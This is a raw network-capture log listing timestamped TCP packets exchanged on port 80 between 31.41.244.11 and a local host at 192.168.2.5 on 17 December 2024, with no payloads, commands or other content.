Dec 17, 2024 06:03:12.141787052 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.141885042 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.141921997 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.142018080 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.143174887 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.143255949 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.143259048 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.143318892 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.144639015 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.144710064 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.144800901 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.145333052 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.145385027 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.145497084 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.146214008 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.146572113 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.149966955 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.276202917 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.276388884 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.276437044 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.276575089 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.276865005 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.276876926 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.277033091 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.278009892 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.278021097 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.278074980 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.279191971 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.279243946 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.279334068 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.279386997 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.280421972 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.280432940 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.280471087 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.281629086 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.281646967 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.281675100 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.281713963 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.282671928 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.282725096 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.282844067 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.282892942 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.283902884 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.283953905 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.284003973 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.284051895 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.285233974 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.285244942 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.285283089 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.285299063 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.286377907 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.286389112 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.286431074 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.287460089 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.287511110 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.287543058 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.287709951 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.288695097 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.288744926 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.288794041 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.288841963 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.289860010 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.289907932 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.290025949 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.290080070 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.291101933 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.291160107 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.291224003 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.291275978 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.292330027 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.292340994 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.292386055 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.293500900 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.293513060 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.293550014 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.294722080 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.294775963 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.294806957 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.294853926 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.295875072 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.295927048 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.296011925 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.296058893 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.297060966 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.297116041 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.297164917 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.297215939 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.298182964 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.298202038 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.298228025 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.298252106 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.299381018 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.299439907 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.299503088 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.299551010 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.300621033 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.300668001 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.300739050 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.300786018 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.301804066 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.301863909 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.301928997 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.301976919 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.303085089 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.303096056 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.303134918 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.304126024 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.304178953 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.304305077 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.304347038 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.305423021 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.305433035 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.305474043 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.306565046 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.306612968 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.306719065 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.306772947 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.307821989 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.307833910 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.307874918 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.309007883 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.309020042 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.309075117 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.310209036 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.310220957 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.310267925 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.311317921 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.311378002 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.311393023 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.311464071 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.312622070 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.312674046 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.312702894 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.312752008 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.313802958 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.313813925 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.313855886 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.314862967 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.314913988 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.314992905 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.315043926 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.316108942 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.316155910 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.316222906 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.316272020 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.317246914 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.317296028 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.317369938 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.317418098 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.318473101 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.318531036 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.318599939 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.318649054 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.319633007 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.319684982 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.319783926 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.319834948 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.320820093 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.321039915 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.321096897 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.322061062 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.322235107 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.322309971 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.323278904 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.323291063 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.323363066 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.324390888 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.324465990 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.324489117 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.324517012 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.325721979 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.325773954 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.325829029 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.325881004 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.326802015 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.326849937 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.326874971 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.326926947 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.327967882 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.328020096 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.328054905 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.328104019 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.329207897 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.329258919 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.329693079 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.329742908 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.330461979 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.330473900 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.330513954 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.331690073 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.331701040 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.331742048 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.332889080 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.332901001 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.332942009 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.333961964 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.334012032 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.334055901 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.334125042 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.335220098 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.335266113 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.335355997 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.335411072 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.336443901 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.336456060 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.336503029 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.337558985 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.337610006 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.337645054 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.337694883 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.338665009 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.338713884 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.470752001 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.470910072 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.470994949 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.471189022 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.471388102 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.471441984 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.472512007 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.472564936 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.472702026 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.473779917 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.473793983 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.473830938 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.473865032 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.474927902 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.474940062 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.474991083 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.476164103 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.476182938 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.476242065 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.477237940 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.477288008 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.477422953 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.478039026 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.478049040 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.478056908 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.478068113 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.478102922 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.478140116 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.478652000 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.478770018 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.478828907 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.479846001 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.479981899 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.480051041 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.481050968 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.481125116 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.481158018 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.481915951 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.482331038 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.482343912 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.482391119 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.483392954 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.483505964 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.483572006 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.486653090 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.486664057 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.486675024 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.486685038 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.486722946 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.486747026 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.487041950 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.487092018 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.487101078 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.488282919 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.488293886 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.488347054 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.489392996 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.489480972 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.489537954 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.490562916 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.490664005 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.490736008 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.491791010 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.491869926 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.491905928 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.492952108 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.493021965 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.493037939 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.493091106 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.494183064 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.494265079 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.494287014 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.494328022 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.495353937 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.495431900 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.495491982 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.496520996 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.496645927 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.496707916 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.497689962 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.497745991 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.497816086 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.498989105 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.499000072 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.499048948 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.499089003 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.500143051 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.500231028 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.500293970 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.501305103 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.501401901 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.501461029 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.502484083 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.502697945 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.502706051 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.502741098 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.503739119 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.503751040 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.503808975 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.503838062 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.504950047 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.505013943 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.505044937 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.505089045 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.506047010 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.506112099 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.506150961 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.506207943 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.507355928 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.507366896 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.507406950 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.507435083 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.508497953 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.508558035 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.508563042 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.508604050 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.509633064 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.509701014 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.509774923 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.509833097 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.510904074 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.510915041 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.510967970 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.510998964 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.512197018 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.512213945 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.512264013 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.513206959 CET	80	49830	31.41.244.11	192.168.2.5
